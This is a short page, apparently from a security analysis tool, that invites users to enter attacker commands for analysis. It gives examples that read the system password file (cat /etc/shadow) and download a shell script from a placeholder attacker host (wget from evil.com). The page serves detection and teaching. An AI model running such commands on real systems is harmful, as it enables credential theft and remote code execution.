Type attacker commands below and see real-time intelligence analyse
Type the commands an attacker would run (one per line and Analyse). Example: id cat /etc/shadow wget http://evil.com/shell.sh
id
cat /etc/shadow
wget http://evil.com/shell.sh